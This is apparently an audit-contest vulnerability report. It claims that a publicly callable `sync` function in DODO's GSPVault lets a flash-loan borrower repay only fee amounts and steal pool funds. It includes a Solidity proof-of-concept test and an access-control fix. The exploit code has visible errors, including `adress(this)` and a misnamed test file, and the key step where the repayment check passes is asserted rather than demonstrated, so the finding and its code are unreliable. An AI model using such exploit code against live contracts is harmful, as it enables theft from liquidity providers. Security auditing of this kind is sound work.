Massive Fern Bobcat

high

# Flash loan borrower can steal funds

## Summary
The `GSPTrader.sol` contract is vulnerable to a flash loan exploit due to the public accessibility of the `sync` function in `GSPVault.sol`. This vulnerability allows a user to manipulate the contract state during a flash loan, potentially leading to the theft of funds.


## Vulnerability Detail
The flash loan function in `GSPTrader.sol` can be exploited through the following steps:
1. The user obtains a flash loan.
2. The user calls the public `sync` function in `GSPVault.sol`, which synchronizes the reserves with the current token balances.
3. The user repays the flash loan with the exact `_MT_FEE_BASE_` and `_MT_FEE_QUOTE_` token amounts.
4. The `require` check in `GSPTrader.sol` passes because the balances match the reserves, allowing the flash loan to be successfully completed without actually returning the borrowed funds.

This exploit is made possible because the `sync` function can be called by any user, allowing them to manipulate the reserve balances during the flash loan process.


## Impact
This vulnerability can lead to the theft of funds from the contract, as users can exploit the flash loan mechanism to withdraw more tokens than they return. It undermines the security and integrity of the flash loan process and the contract as a whole.


## Code Snippet
- **Location of Issue**: [GSPTrader.sol#L122-L128](https://github.com/sherlock-audit/2023-12-dodo-gsp/blob/main/dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPTrader.sol#L122-L128)
- **Relevant Code Section in `GSPVault.sol`**:
  ```solidity
  function sync() external nonReentrant {
      _sync();
  }
  ```
  
  POC exploit code  - paste it in GPSTrader.t.sol
  ```solidity
      function test_flashLoadSteal() public {
         vm.startPrank(DAI_WHALE);
        dai.transfer(USER, BASE_RESERVE + BASE_INPUT);
        vm.stopPrank();
        vm.startPrank(USDC_WHALE);
        usdc.transfer(USER, QUOTE_RESERVE + QUOTE_INPUT);
        vm.stopPrank();

        // User buys shares
        vm.startPrank(USER);
        dai.transfer(address(gsp), BASE_RESERVE);
        usdc.transfer(address(gsp), QUOTE_RESERVE);
        gsp.buyShares(USER);

         // flashloan - sellquote
        (uint256 amountBase, , ,) = gsp.querySellQuote(USER, QUOTE_INPUT);
        usdc.transfer(address(gsp), QUOTE_INPUT);
        gsp.flashLoan(amountBase + 1e18, 0, adress(this), "");
    }

     function DSPFlashLoanCall(
        address sender,
        uint256 baseAmount,
        uint256 quoteAmount,
        bytes calldata data
    ) external {
       vm.startPrank(USER);
       gsp.sync();
        dai.transfer(address(gsp), _MT_FEE_BASE_);
        usdc.transfer(address(gsp), _MT_FEE_QUOTE_);
    }
    ```

## Tool used

Manual Review

## Recommendation
Restrict the access to the sync function in GSPVault.sol to prevent it from being called by unauthorized users. This can be achieved by adding an access control mechanism, such as an onlyOwner or onlyAuthorized modifier.
By limiting the public accessibility of the sync function, the contract can prevent malicious actors from manipulating the reserve balances during a flash loan, thereby safeguarding the funds and maintaining the integrity of the flash loan process.